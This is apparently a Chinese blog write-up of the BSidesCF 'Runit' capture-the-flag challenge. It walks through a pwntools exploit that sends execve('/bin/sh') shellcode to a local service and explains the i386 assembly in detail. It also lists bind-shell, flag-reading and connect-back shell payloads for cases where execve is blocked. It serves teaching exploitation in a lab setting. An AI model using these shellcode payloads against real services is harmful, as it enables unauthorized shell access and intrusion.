pwn-shellcode执行

2024-08-23 20:28
文章标签 执行 pwn shellcode

本文主要是介绍pwn-shellcode执行,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言:

这应该是pwn中最简单的,就是利用pwntools生成shellcode,远程执行获取shell,这里以BSidesCF_Runit为例:

分析:

拿到runit后首先看下其安全属性和对应的版本,使用checksec

可以看到,什么安全防护都没有设置,那直接反编译看一眼

 

这太简单了,就是使用mmap申请一块内存后,将获取到的内容进行写入我们申请的内存中,判断内容不为空直接就执行了,那我们只需要发送一段shellcode即可

from pwn import *context.arch = 'i386'p = remote('127.0.0.1', 10001)payload = asm(shellcraft.sh(), os = 'linux')p.sendlineafter(b'stuff!!\n', payload)#sleep(2)
#p.send(payload) p.interactive()

代码也很简单,就是利用 asm(shellcraft.sh(), os = 'linux')生成一段linux下获取shell的shellcode

其中可以选择使用sendlineafter方法,当发现stuff字符串发送payload内容,或者sleep几秒钟直接发送数据,最后利用interactive进行交互操作

在pwntools文件中可以看到其代码,位置如下:

pwnlib\shellcraft\templates\arm\linux

可以看到其除了sh以外还有其他的shellcode命令

shellcode分析:

深究一下,看看其具体的shellcode代码

 

 使用readelf可以看到是小断存储32位

由此可以知道 2F 62 69 6E 2F 2F 2F 73 68是/bin///sh 此处就是为了压入字符串,即push b'/bin///sh\x00

mov ebx, esp: 将栈顶指针存储在 ebx 寄存器中,作为 execve() 的第一个参数 path。

然后利用如下将 'sh\x00' 字符串压入栈中。

push 0x1010101、xor dword ptr [esp], 0x1016972:

xor ecx, ecx、push ecx: 压入 null 终止符。
push 4、pop ecx、add ecx, esp: 计算参数数组的地址,存储在 ecx 寄存器中,作为 execve() 的第二个参数 argv。

最后就是第三个参数

xor edx, edx: 将 edx 寄存器清零,作为 execve() 的第三个参数 envp。

最后执行 execve() 系统调用:
push SYS_execve、pop eax: 将系统调用号 SYS_execve (值为 0xb) 存入 eax 寄存器。
int 0x80: 触发 int 0x80 系统调用中断,执行 execve() 系统调用。

本质上我们就是希望执行execve(path='/bin///sh', argv=['sh'], envp=0)

其中 ebx,ecx和edx分别为其三个参数

为什么这样做,是因为Linux 32位系统上使用 IA-32 ABI 调用约定。其参数传递: 前 3 个参数分别存放在 ebx、ecx、edx 寄存器中。第 4 个及之后的参数需要压入栈中。返回值: 存放在 eax 寄存器中。

所以linux制作shellcode方法归纳下为:

1.我们首先需要确定要调用的方法即为具体的调用链

2.将所需要参数从左到右依次存放如ebx,ecx ,edx中

3.然后将需要调用的方法地址存入eax中

4.采用int 0x80触发系统断点自动调用eax的内容进而进入指定函数中

5.函数返回的结果存储在eax中,如果存在多个调用需要注意

作为练习,我们可以换个简单点的执行,例如

execve(path='/bin///sh', 0, 0)

对应编写汇编代码:

xor eax, eax
push eax        ; string terminator
push 0x68732f6e ; "hs/n"
push 0x69622f2f ; "ib//"
mov ebx, esp    ; "//bin/sh",0 pointer is ESP
xor ecx, ecx    ; ECX = 0
xor edx, edx    ; EDX = 0
mov al, 0xb     ; execve()
int 0x80

ebx为路径,ecx和edx分别为0,通过系统中断调用eax的值,进入执行 execve方法

测试如下

同样可以成功执行 

实测:

首先我们使用如下命令将输出输入转发到指定端口

socat tcp-listen:10001,reuseaddr,fork EXEC:./runit,pty,raw,echo=0

这样就转发到了本地的10001端口,然后就可以执行我们编号的python程序,可以成功的拿下shell

 

抓包看下流量

 

绕过:

如果execve被禁止了怎么半,我们除了利用上述进行手工编写shellcode,也可以使用如下payload

shellcode = asm(pwnlib.shellcraft.amd64.linux.bindsh(9999, 'ipv4')) # 绑定shell到999端口
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat("/flag", 1)) # 读取/flag,输出到标准输出
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat2("/flag", 1, 0x30)) # 读取/flag,输出到标准输出
shellcode = asm(pwnlib.shellcraft.amd64.linux.socket("ipv4", "tcp")+\pwnlib.shellcraft.amd64.linux.connect("127.0.0.1", 9999, 'ipv4')+\pwnlib.shellcraft.amd64.linux.dupsh('rax')) 

结尾:

以上为32位的程序具体的分析过程,包含了shellcode的编写和执行,64位大同小异, 执行shellcode主要需要注意对应系统的调用约定和传参约定

这篇关于pwn-shellcode执行的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1100416

相关文章

如何使用 Bash 脚本中的time命令来统计命令执行时间(中英双语)

《如何使用Bash脚本中的time命令来统计命令执行时间(中英双语)》本文介绍了如何在Bash脚本中使用`time`命令来测量命令执行时间,包括`real`、`user`和`sys`三个时间指标,... 使用 Bash 脚本中的 time 命令来统计命令执行时间在日常的开发和运维过程中,性能监控和优化是不

C#如何优雅地取消进程的执行之Cancellation详解

《C#如何优雅地取消进程的执行之Cancellation详解》本文介绍了.NET框架中的取消协作模型,包括CancellationToken的使用、取消请求的发送和接收、以及如何处理取消事件... 目录概述与取消线程相关的类型代码举例操作取消vs对象取消监听并响应取消请求轮询监听通过回调注册进行监听使用Wa

PHP执行php.exe -v命令报错的解决方案

《PHP执行php.exe-v命令报错的解决方案》:本文主要介绍PHP执行php.exe-v命令报错的解决方案,文中通过图文讲解的非常详细,对大家的学习或工作有一定的帮助,需要的朋友可以参考下... 目录执行phpandroid.exe -v命令报错解决方案执行php.exe -v命令报错-PHP War

Oracle数据库执行计划的查看与分析技巧

《Oracle数据库执行计划的查看与分析技巧》在Oracle数据库中,执行计划能够帮助我们深入了解SQL语句在数据库内部的执行细节,进而优化查询性能、提升系统效率,执行计划是Oracle数据库优化器为... 目录一、什么是执行计划二、查看执行计划的方法(一)使用 EXPLAIN PLAN 命令(二)通过 S

maven 编译构建可以执行的jar包

💝💝💝欢迎莅临我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:「stormsha的主页」👈,「stormsha的知识库」👈持续学习,不断总结,共同进步,为了踏实,做好当下事儿~ 专栏导航 Python系列: Python面试题合集,剑指大厂Git系列: Git操作技巧GO

jenkins 插件执行shell命令时,提示“Command not found”处理方法

首先提示找不到“Command not found,可能我们第一反应是查看目标机器是否已支持该命令,不过如果相信能找到这里来的朋友估计遇到的跟我一样,其实目标机器是没有问题的通过一些远程工具执行shell命令是可以执行。奇怪的就是通过jenkinsSSH插件无法执行,经一番折腾各种搜索发现是jenkins没有加载/etc/profile导致。 【解决办法】: 需要在jenkins调用shell脚

Lua 脚本在 Redis 中执行时的原子性以及与redis的事务的区别

在 Redis 中,Lua 脚本具有原子性是因为 Redis 保证在执行脚本时,脚本中的所有操作都会被当作一个不可分割的整体。具体来说,Redis 使用单线程的执行模型来处理命令,因此当 Lua 脚本在 Redis 中执行时,不会有其他命令打断脚本的执行过程。脚本中的所有操作都将连续执行,直到脚本执行完成后,Redis 才会继续处理其他客户端的请求。 Lua 脚本在 Redis 中原子性的原因

Smarty模板执行原理

为了实现程序的业务逻辑和内容表现页面的分离从而提高开发速度,php 引入了模板引擎的概念,php 模板引擎里面最流行的可以说是smarty了,smarty因其功能强大而且速度快而被广大php web开发者所认可。本文将记录一下smarty模板引擎的工作执行原理,算是加深一下理解。 其实所有的模板引擎的工作原理是差不多的,无非就是在php程序里面用正则匹配将模板里面的标签替换为php代码从而将两者

(function() {})();只执行一次

测试例子: var xx = (function() {     (function() { alert(9) })(); alert(10)     return "yyyy";  })(); 调用: alert(xx); 在调用的时候,你会发现只弹出"yyyy"信息,并不见弹出"10"的信息!这也就是说,这个匿名函数只在立即调用的时候执行一次,这时它已经赋予了给xx变量,也就是只是

Java程序到CPU上执行 的步骤

相信很多的小伙伴在最初学习编程的时候会容易产生一个疑惑❓,那就是编写的Java代码究竟是怎么一步一步到CPU上去执行的呢?CPU又是如何执行的呢?今天跟随小编的脚步去化解开这个疑惑❓。 在学习这个过程之前,我们需要先讲解一些与本内容相关的知识点 指令 指令是指导CPU运行的命令,主要由操作码+被操作数组成。 其中操作码用来表示要做什么动作,被操作数是本条指令要操作的数据,可能是内存地址,也